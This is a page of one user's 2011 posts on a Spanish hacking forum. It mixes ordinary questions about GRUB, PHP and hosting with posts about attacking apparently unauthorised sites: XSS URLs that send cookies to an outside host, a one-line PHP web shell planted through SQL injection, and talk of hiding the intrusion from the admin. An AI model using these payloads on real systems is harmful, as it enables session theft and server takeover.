elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13
81  Seguridad Informática / Nivel Web / Re: Shell php a medias en: 5 Marzo 2011, 22:55 pm
si yo tambien tenia la duda que podia ser eso, el uso de las tags. Ahora veamos, tengo que subir otro archivo .php al servidor ya que INTO OUTFILE no sobreescribe ficheros, por lo que estarian alojados 2 archivos "raros" en ese subdirectorio y no quiero llamar la atencion del admin hasta terminar mis practicas xD.

Pero bueno, me voy a arriesgar a crear otro archivo esperando que el segundo funcione y a traves de la shell intentar borrar el primer archivo.....se puede no??  :xD
82  Seguridad Informática / Nivel Web / Re: Cross Site Scripting en: 5 Marzo 2011, 22:12 pm
Hay otras formas de redireccionar como estas:

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>window.location='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>document.location.href='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>location.assign('http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie);</script>

Aca te dejo un tuto bastante bueno y claro por si te interesa: http://4party.cuatrovientos.org/files/xssjavascript.pdf


83  Seguridad Informática / Nivel Web / Re: Shell php a medias en: 5 Marzo 2011, 21:55 pm
Gracias ~ Yoya ~, bien explicado el uso de INTO OUTFILE.

Pero ¿A que se debera que no se ejecuta el codigo php?, es decir supongamos que el problema esta en el uso de la funcion system o por el tipo de metodo usado ($_REQUEST). Aun asi el codigo php no se deberia mostrar en el codigo fuente.
84  Seguridad Informática / Nivel Web / Shell php a medias en: 5 Marzo 2011, 18:35 pm
Bueno, pues despues de venir testeando SQL Injection con una aplicacion web en X servidor, consegui sacar alguna info, el usuario y contraseña del admin, entre otras cosas.Sin embargo hay algo que no he podido testear y es una shell php, dentro del directorio web encontre un sub directorio donde tengo permiso de escritura, mediante un INTO OUTFILE escribi el codigo de la shell
Código:
<? system($_REQUEST['cmd']); ?>
, pero al intentar ejecutarlo no pasa absolutamente nada, y es obvio q no pase nada por que si veo el codigo fuente de archivo se muestra el codigo php, como si php no lo estuviese parseando.¿A que se debe esto?¿Es que acaso no es suficiente con que el archivo este en algun subdirectorio del arbol web?
85  Sistemas Operativos / GNU/Linux / Ayuda con grub en Ubuntu 10.10 Netbook edition en: 26 Febrero 2011, 08:21 am
Buenas a todos.

Por lo que parece en el foro muchos tenemos problemas con el grub....

Hace unos días instale en mi laptop Ubuntu 10.10 netbook edition, durante la instalación no tuve ningún problema (desde USB), pero desde el primer arranque me ha salido la consola del grub, la única forma que he encontrado para que arranque normalmente es ejecutando en dicha consola el comando
Código:
root (hd0,3)
que es donde tengo instalado Ubuntu, reinicio y arranca bien el grub de Ubuntu, e incluso no ha tenido problemas para reconocer una instalación previa de win 7.

Que es lo que necesito configurar para que me carge directamente el grub de Ubuntu y no la consola?

Desde ya muchas gracias.
86  Seguridad Informática / Nivel Web / Ayuda con una union (sql injection) en: 12 Febrero 2011, 02:21 am
Buenas a todos.
Quisiera que me ayudaran a saber que anda mal o que estoy haciendo mal al intentar inyectar la sentencia de union. La situacion es la siguiente,al inyectar el order by N -- al final de la consulta que sera ejecutada en el servidor, pareciese que unicamente se devuelve una columna por que al inyectar 'order by 2--' ya obtengo el unknown column... . es decir todo bien con un 'order by 1--'y se devuelve como parte del error la consulta entera donde se encuentra el error, sin embargo al intentar la union con una sola columna obtengo un error diciendo q el numero de columnas es diferentes, y ademas la consulta que se devuelve con el error no es la misma que devolvia en el error de order by N, en esta consulta se aprecia que se devuelven 10 columnas...intente entonces unirla con 10 columnas, pero sigo obteniendo el mismo error.

Espero que me ayuden a saber el por que de este error...pues en mis pocos años de practica nunca me habia encontrado con un error de este tipo.
87  Foros Generales / Foro Libre / Re: Solucionando problemas en PHP en: 6 Enero 2011, 00:31 am
No creo que a tu novia le agrade el que andes publicando sus conversaciones en un foro de hacking!!!   ;D
88  Foros Generales / Foro Libre / Re: ¿Que Número De Usuario Sos? en: 6 Enero 2011, 00:24 am
Le sigue x254 que por cierto desde el 25 de septiembre de 2004 no se pasa XD
A lo mejor se le olvido la contraseña  :xD
89  Programación / PHP / Re: UPDATE espacio en blanco en php en: 5 Enero 2011, 03:30 am
Que tal si elaboras mejor la pregunta, y pues como dice Shell Root
Citar
El campo en null, quiere decir que ese campo se podra dejar vacio, al poner not null ese campo, al insertar los datos estaras obligado a insertar los datos
Ademas tambien recorda que un campo con valor NULL no es lo mismo que un campo vacio, ni siquiera un espacio en blanco.
90  Programación / Desarrollo Web / Re: Un buen hosting gratuito en: 5 Enero 2011, 03:22 am
Citar
000webhost.com
;D

Ese mismo, buen servicio y como extra puedo decir que los subdominios no son tan largos como los de la mayoria de hosting gratuitos, por ejemplo cuando yo me he registrado, me han asignado subdominios tipo  misitio.comuf.com o misitio.comli.com, entre otros.
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines